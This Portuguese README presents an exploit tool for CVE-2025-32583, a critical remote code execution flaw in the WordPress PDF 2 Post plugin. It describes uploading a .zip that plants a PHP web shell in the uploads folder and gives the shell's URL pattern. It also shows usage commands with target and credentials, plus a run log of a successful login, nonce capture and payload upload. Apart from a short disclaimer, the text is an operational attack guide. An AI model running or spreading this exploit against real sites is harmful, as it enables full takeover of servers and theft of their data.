
WordPress PDF 2 Post Plugin <= 2.4.0 é vulnerável a Execução Remota de Código (RCE) +Subscriber
Vulnerabilidade CRÍTICA
CVE-ID: CVE-2025-32583
Severidade: 9.9 (CRÍTICA)
Vector CVSS:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Uma vulnerabilidade no plugin PDF 2 Post do WordPress (desenvolvido por termel) permite Inclusão Remota de Código (RCE) devido a Controlo Inadequado da Geração de Código.
Versões afetadas: <= 2.4.0
A falha permite que utilizadores autenticados (mesmo com privilégios baixos) carreguem um .zip contendo código PHP. Uma vez extraído pelo plugin, o ficheiro PHP malicioso pode ser executado remotamente através de um diretório de uploads acessível publicamente.
Nxploited.zip maliciosononce dinâmicoApós o envio do payload, a shell PHP será extraída para a pasta de uploads do WordPress.
🛠️ Caminho predefinido:
/wp-content/uploads/YYYY/MM/nxploited.php
Por exemplo, se for explorado em Maio de 2025, o URL seria:
http://target-site.com/wp-content/uploads/2025/05/nxploited.php
🕓 O WordPress organiza automaticamente os uploads por ano/mês, por isso certifique-se de verificar a pasta correta com base na data atual.
python CVE-2025-32583.py --help
python CVE-2025-32583.py -u http://target-site.com/wordpress -un admin -p admin
Exploit By: Khaled_alenazi (Nxploited)
[+] Payload Nxploited.zip created successfully.
[+] Logged in successfully.
[+] Found nonce: 3c3e8fff7c
[+] Payload uploaded.
CVE-2025-32583.py
Esta ferramenta destina-se estritamente a fins educacionais e de testes de penetração autorizados.
Qualquer uso indevido deste código para atividades não autorizadas é estritamente proibido.
O autor não assume nenhuma responsabilidade por qualquer dano ou uso indevido.
Por: Khaled_alenazi (Nxploited)